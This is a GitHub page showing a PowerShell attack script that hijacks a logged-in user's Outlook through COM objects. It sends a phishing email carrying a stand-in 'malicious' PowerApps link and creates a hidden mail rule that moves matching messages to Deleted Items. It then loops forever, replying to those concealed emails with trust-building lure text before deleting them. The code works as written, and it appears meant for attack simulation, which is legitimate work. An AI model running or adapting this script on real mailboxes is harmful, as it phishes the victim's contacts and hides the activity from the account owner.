-
Notifications
You must be signed in to change notification settings - Fork 0
/
Hijack_Outlook_w_COM_Objects.ps1
126 lines (88 loc) · 4.27 KB
/
Hijack_Outlook_w_COM_Objects.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
# Description:
# This script will interact with the open Outlook client using COM objects to send an email + create a mail rule.
# Variables
$to = "[email protected]"
#####
##### OUTLOOK COM Functions
#####
function Send-Email($outlook, $to, $subject, $body) {
# create Outlook MailItem named Mail using CreateItem() method
$Mail = $outlook.CreateItem(0)
# add properties as desired
$Mail.To = [string]$to
$Mail.Subject = [string]$subject
$Mail.Body = [string]$body
# send message
$Mail.Send()
write-host "[+] Sent Outlook Email to $to"
}
function Add-Rule($outlook, $rule_name, $bodyOrSubjectText) {
# Get the Outlook namespace
$Namespace = $Outlook.GetNamespace("MAPI")
# Get a list of all of the Outlook rules
$Rules = $Namespace.DefaultStore.GetRules()
If ($Rules.Count -gt 0 -and ($rules | select Name).Name.Contains($rule_name)) {
write-host "[!] Mail rule with that name already exists, skipping"
return
}
# Now the fun part. Let's start creating a rule
$Rule = $Rules.create(
[string]$rule_name, # The name of the rule
0 # https://learn.microsoft.com/en-us/dotnet/api/microsoft.office.interop.outlook.olruletype?view=outlook-pia | [Microsoft.Office.Interop.Outlook.OlRuleType]::olRuleReceive # Weird looking, but just means the rule will target received emails
)
# Start creating the
$Condition = $Rule.Conditions.BodyOrSubject
$Condition.Enabled = $true
$condition.text = @($bodyOrSubjectText)
# send item to deleted folder
$Action = $Rule.Actions.Delete
$Action.Enabled = $True
# Now save everything
$Rules.Save()
write-host "[+] Created new malicious mail rule to route $bodyOrSubjectText to Deleted Items folder"
}
function Invoke-RespondToDeletedEmails($outlook, $bodyOrSubjectText = "this_string_should_not_be_in_an_email", $reply_body) {
# create Outlook MailItem named Mail using CreateItem() method
$namespace = $outlook.GetNamespace("MAPI")
# https://learn.microsoft.com/en-us/dotnet/api/microsoft.office.interop.outlook.oldefaultfolders?view=outlook-pia
$deletedItemsFolder = $namespace.GetDefaultFolder(3) # [Microsoft.Office.Interop.Outlook.OlDefaultFolders]::olFolderDeletedItems)
$emails = $deletedItemsFolder.Items
foreach ($email in $emails) {
If (
$email.subject.Contains($bodyOrSubjectText) -or $email.body.Contains($bodyOrSubjectText)
) {
Write-Output "Found Email! Sending reply and deleting.`n(Subject): $($email.Subject)" # - $($email.body)"
$email.UnRead = $false
$sent_from = $email.sender.Address
$reply = $email.Reply()
$reply.HTMLBody = $reply_body
$reply.Send()
# delete email
$email.Delete()
}
}
}
#### ^ END FUNCTIONS ^
##################
#### MAIN
##################
##### Stage 2: MALICIOUS Outlook Actions (Technique: COM Objects)
# create COM object named Outlook
# Add-Type -AssemblyName Microsoft.Office.Interop.Outlook
# [Reflection.Assembly]::LoadWithPartialname("Microsoft.Office.Interop.Outlook")
$outlook = New-Object -ComObject Outlook.Application
write-host "[+] Interacting with Outlook as user (COM Objects): $($outlook.Session.CurrentUser.AddressEntry.GetExchangeUser().PrimarySmtpAddress)"
# Create mail rule
# https://davejlong.com/scripting-office-with-powershell-creating-outlook-rules/
# send phishing email
$malicious_powerapp_url = "https://powerapps.com/mybadapp" # $new_app.powerapp_phish_url
Send-Email -outlook $outlook -to $to -subject "Please review: $malicious_powerapp_url" -body "Can you please take a look at this, what do you think? $malicious_powerapp_url"
Add-Rule -outlook $outlook -rule_name "Malicious Rule: Route powerapp email to trash" -bodyOrSubjectText $malicious_powerapp_url
### FINAL LOOP
write-host "DONE! Looping Outlook / Teams Actions"
while ($true) {
# outlook, check emails + respond to deleted emails
# in a real attack scanario a C2 server may be used for a more convincing phish
Invoke-RespondToDeletedEmails -outlook $outlook -bodyOrSubjectText $malicious_powerapp_url -reply_body "It's totally cool, we are co-workers. Trust. $malicious_powerapp_url"
start-sleep 1
}